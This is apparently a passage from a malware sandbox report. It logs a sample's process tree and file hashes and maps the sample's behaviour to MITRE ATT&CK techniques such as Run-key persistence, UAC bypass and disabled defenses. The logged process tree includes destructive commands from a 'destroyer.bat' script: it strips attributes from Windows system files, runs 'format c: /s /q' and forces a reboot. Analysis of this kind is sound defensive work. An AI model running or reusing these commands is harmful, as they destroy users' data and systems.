        7⤵
        
        PID:1224
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:184
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:2508
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:2496
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:768
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:2540
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:2492
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:1928
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        Delays execution with timeout.exe
        
        PID:2536
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:864
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:2736
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:1444
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:2764
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:2000
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:2748
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:3036
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:1452
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:2192
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:2212
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:2024
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:1704
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:2892
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:2940
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:1736
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:1956
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:2948
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:2964
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:1924
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:1984
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:1312
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:2960
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:1960
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:2100
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:2580
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:956
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:1640
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:2576
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:2052
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:840
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:2436
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        Delays execution with timeout.exe
        
        PID:1044
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:2128
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        Delays execution with timeout.exe
        
        PID:1724
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:2996
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:2280
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:3004
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:3008
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:2760
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:2548
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:2584
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        Delays execution with timeout.exe
        
        PID:820
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:2796
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:2732
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:952
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:936
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:2564
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        Delays execution with timeout.exe
        
        PID:1980
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:1324
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:2836
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:1764
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        Delays execution with timeout.exe
        
        PID:2856
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:2860
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:2320
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:2196
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:1852
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:2808
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:2844
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:1532
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:1800
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:1092
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:2672
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:1696
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        Delays execution with timeout.exe
        
        PID:1128
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:2256
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:604
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:1664
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:868
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:1388
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        Delays execution with timeout.exe
        
        PID:3064
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:2176
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:1096
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:1828
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:2744
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:940
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:1148
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:2344
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        Delays execution with timeout.exe
        
        PID:1192
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:1556
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:1712
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:1780
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:2208
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:832
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:912
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:920
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:1256
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:792
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:1548
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:320
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:2328
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:2348
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:2384
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:2356
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:1996
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:2216
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:2120
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:996
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:1512
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:2416
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:592
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:1100
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        Delays execution with timeout.exe
        
        PID:2088
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:2124
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        Delays execution with timeout.exe
        
        PID:1708
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:2408
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        Delays execution with timeout.exe
        
        PID:2904
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:2260
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:2444
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:3032
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        Delays execution with timeout.exe
        
        PID:3020
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:2712
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:2600
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:3048
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:2768
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:2648
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        Delays execution with timeout.exe
        
        PID:2828
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:2572
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:2528
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:2568
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:2968
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:2680
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:3016
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:2984
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:2552
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:2164
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:2372
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:2612
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:2464
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:2040
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:1732
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:1796
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:2544
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:2608
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:876
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:2044
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:2516
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:2668
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        Delays execution with timeout.exe
        
        PID:2632
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:3044
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:1364
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:2752
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:2708
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:1396
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:2652
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:2624
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        Delays execution with timeout.exe
        
        PID:2740
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:2160
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:284
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:1632
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:2312
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:2468
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:2932
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:2944
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:2292
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:1968
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:2456
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:2952
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:1988
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:2936
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:2780
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:2028
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:2308
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:1944
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:2052
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\$Recycle.Bin\destroyer.bat" "
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3024
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib -r -s -h "C:\Windows\System32\*.*"
        7⤵
        Views/modifies file attributes
        
        PID:1720
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib -r -s -h "C:\Windows\*.*"
        7⤵
        Views/modifies file attributes
        
        PID:2272
        
        C:\Windows\SysWOW64\format.com
        
        format c: /s /q
        7⤵
        
        PID:2976
        
        C:\Windows\SysWOW64\shutdown.exe
        
        shutdown /r /t 0
        7⤵
        
        PID:2552
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\$Recycle.Bin\destroyer.bat" "
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2624
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\$Recycle.Bin\cpuu.bat" "
        6⤵
        
        PID:2888
      - C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        6⤵
        
        PID:1500

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x0
1⤵
PID:384

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x52c
1⤵
PID:2784

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x1
1⤵
PID:1092

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\$Recycle.Bin\cpuu.bat.part

Filesize
95B

MD5
127f7ac0b5f086b435616d0ee3362564

SHA1
97f2579381d570d125818bdb0857a7aadb918898

SHA256
24431a63fb9cd3e406e32da8e950fd95d9bf09ddbd3411c29df004a3253aa17a

SHA512
8864aa7d08a18b0a8ab2943e7d25325ac208a5e93306c338a323368e66d5c290860b8c924769b33f797739d43822735a04eb324c4010197f6efed9cf168e5528

Download Submit
C:\$Recycle.Bin\destroyer.bat.part

Filesize
302B

MD5
737fb9f41efffbf88c3c7b110d265b40

SHA1
32c6386afaefdea4a5ded8dbd52d3884f1c5f92c

SHA256
a53746b1b3065b36bab58b6a8f4d5f4cd11dd3b0a5d85fd697d19cacc79951d1

SHA512
2e4c11b48abd58c9315d48aa1f5b97e631cab0fbed21b9ad8c0c05e5562690aa1319461dd5fd9fd063fd081781b28178daa7a7cb7d408e1fe95e5a1f13cae441

Download Submit
C:\Users\Admin\AppData\Local\Temp\install.vbs

Filesize
532B

MD5
54092daa1c86c0bb88b02c6c785c3f56

SHA1
b18d571d5ae2661afcec864164dcdf504d5f8aa9

SHA256
e04f8f0d847b43ce378eb5732fb167cbb18956fa8f0a56d7ccbe1bd3ef66d3ae

SHA512
e9ab8db402092945eed036f9c91e2571337d4f68810d3ab7233d90b57b80d4900294ab30310003e006473f9314baf2caa658038b97c7d77a87f431b4f9df771e

Download Submit
C:\Windows\SysWOW64\Screenshots\time_20240917_214527.dat

Filesize
101KB

MD5
8c882eea012cf73547e2abeacf9a58ba

SHA1
7061af3a5d7b395f681e80592c789e6e4c1471c9

SHA256
a1ebdfc8b539e4238228179b0323c98ef7fec7e742cacf6a4718c2b886a39f0f

SHA512
2e1f3a521e71e55382e1ebdcdd9d00bd8a2029ac7a7dcf116be3c5e258f45e1f2e2ee9fb96d7916df31044792a33cbee64de79182d9911ec991b8097a626e327

Download Submit
C:\Windows\SysWOW64\filer32\logs.dat

Filesize
346B

MD5
70e7cf0b1accad9c5a07b862a82be175

SHA1
4aba24d06898a2a4bbb00354bd927148f1c7777a

SHA256
7ff82fab26adf0a2dfe385ed8b81058dc94414d4c7b82b9488c1e5d69f7d3a44

SHA512
e39323c240266b229e62d3a16da12b072f6f8d2dc6e5ec114a8bef2c645e493f8cc7630fe4435c26cf2a5b592c4fe785551f53fe207ed575190d9b10c3431ebc

Download Submit
C:\Windows\SysWOW64\filer32\logs.dat

Filesize
428B

MD5
322b5c4636907f82a85ecc18e20bc48e

SHA1
70eeae0b91767e116d4ce764655ab7782662d1e2

SHA256
6e8ceabcb6c4108d60a04a64441a85fecc5e032edc88b88e0b7e78cd20bda0ce

SHA512
beffd2a032e471d82990fd182d5bc7b170a548513dd169e543ee0fcd159f2b7ec0f5a81aa3281f8765427b2f3ea54a34da84db61396f5c84db1f7f848c748121

Download Submit
\Windows\SysWOW64\Health\Windows32.exe

Filesize
469KB

MD5
48f4a8f633bf5535811c23a81d8d8506

SHA1
c2a98525bfda82421cb8670db223b19acef31f23

SHA256
9ec9c4c81c67d6628d141981a7020bb7ded83b4c40ff693870cd98eaebf74912

SHA512
7903c322d886bcffc06a9310ba451b0f0eac53d2acedf45b544548ae3656ef477b5a03a86d54452d65461957df4c643082338119bdeb0f2303f528daf0642e29

Download Submit
memory/2108-58-0x00000000000D0000-0x000000000014F000-memory.dmp

Filesize
508KB

Download
memory/2108-68-0x00000000000D0000-0x000000000014F000-memory.dmp

Filesize
508KB

Download
memory/2108-14-0x00000000000D0000-0x000000000014F000-memory.dmp

Filesize
508KB

Download
memory/2108-25-0x00000000000D0000-0x000000000014F000-memory.dmp

Filesize
508KB

Download
memory/2108-27-0x00000000000D0000-0x000000000014F000-memory.dmp

Filesize
508KB

Download
memory/2108-28-0x00000000000D0000-0x000000000014F000-memory.dmp

Filesize
508KB

Download
memory/2108-26-0x00000000000D0000-0x000000000014F000-memory.dmp

Filesize
508KB

Download
memory/2108-32-0x00000000000D0000-0x000000000014F000-memory.dmp

Filesize
508KB

Download
memory/2108-31-0x00000000000D0000-0x000000000014F000-memory.dmp

Filesize
508KB

Download
memory/2108-33-0x00000000000D0000-0x000000000014F000-memory.dmp

Filesize
508KB

Download
memory/2108-34-0x00000000000D0000-0x000000000014F000-memory.dmp

Filesize
508KB

Download
memory/2108-44-0x00000000000D0000-0x000000000014F000-memory.dmp

Filesize
508KB

Download
memory/2108-45-0x00000000000D0000-0x000000000014F000-memory.dmp

Filesize
508KB

Download
memory/2108-48-0x00000000000D0000-0x000000000014F000-memory.dmp

Filesize
508KB

Download
memory/2108-49-0x00000000000D0000-0x000000000014F000-memory.dmp

Filesize
508KB

Download
memory/2108-51-0x00000000000D0000-0x000000000014F000-memory.dmp

Filesize
508KB

Download
memory/2108-52-0x00000000000D0000-0x000000000014F000-memory.dmp

Filesize
508KB

Download
memory/2108-54-0x00000000000D0000-0x000000000014F000-memory.dmp

Filesize
508KB

Download
memory/2108-57-0x00000000000D0000-0x000000000014F000-memory.dmp

Filesize
508KB

Download
memory/2108-13-0x00000000000D0000-0x000000000014F000-memory.dmp

Filesize
508KB

Download
memory/2108-59-0x00000000000D0000-0x000000000014F000-memory.dmp

Filesize
508KB

Download
memory/2108-62-0x00000000000D0000-0x000000000014F000-memory.dmp

Filesize
508KB

Download
memory/2108-64-0x00000000000D0000-0x000000000014F000-memory.dmp

Filesize
508KB

Download
memory/2108-18-0x00000000000D0000-0x000000000014F000-memory.dmp

Filesize
508KB

Download
memory/2108-76-0x00000000000D0000-0x000000000014F000-memory.dmp

Filesize
508KB

Download
memory/2108-77-0x00000000000D0000-0x000000000014F000-memory.dmp

Filesize
508KB

Download
memory/2108-78-0x00000000000D0000-0x000000000014F000-memory.dmp

Filesize
508KB

Download
memory/2108-80-0x00000000000D0000-0x000000000014F000-memory.dmp

Filesize
508KB

Download
memory/2108-81-0x00000000000D0000-0x000000000014F000-memory.dmp

Filesize
508KB

Download
memory/2108-89-0x00000000000D0000-0x000000000014F000-memory.dmp

Filesize
508KB

Download
memory/2108-91-0x00000000000D0000-0x000000000014F000-memory.dmp

Filesize
508KB

Download
memory/2108-94-0x00000000000D0000-0x000000000014F000-memory.dmp

Filesize
508KB

Download
memory/2108-95-0x00000000000D0000-0x000000000014F000-memory.dmp

Filesize
508KB

Download
memory/2108-96-0x00000000000D0000-0x000000000014F000-memory.dmp

Filesize
508KB

Download
memory/2108-97-0x00000000000D0000-0x000000000014F000-memory.dmp

Filesize
508KB

Download
memory/2108-98-0x00000000000D0000-0x000000000014F000-memory.dmp

Filesize
508KB

Download
memory/2108-99-0x00000000000D0000-0x000000000014F000-memory.dmp

Filesize
508KB

Download
memory/2108-103-0x00000000000D0000-0x000000000014F000-memory.dmp

Filesize
508KB

Download
memory/2108-104-0x00000000000D0000-0x000000000014F000-memory.dmp

Filesize
508KB

Download
memory/2108-10-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

Filesize
4KB

Download
memory/2108-11-0x00000000000D0000-0x000000000014F000-memory.dmp

Filesize
508KB

Download
memory/2108-12-0x00000000000D0000-0x000000000014F000-memory.dmp

Filesize
508KB

Download
memory/2772-22-0x0000000000080000-0x00000000000FF000-memory.dmp

Filesize
508KB

Download
memory/2772-23-0x0000000000080000-0x00000000000FF000-memory.dmp

Filesize
508KB

Download
memory/2772-21-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

Errors

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads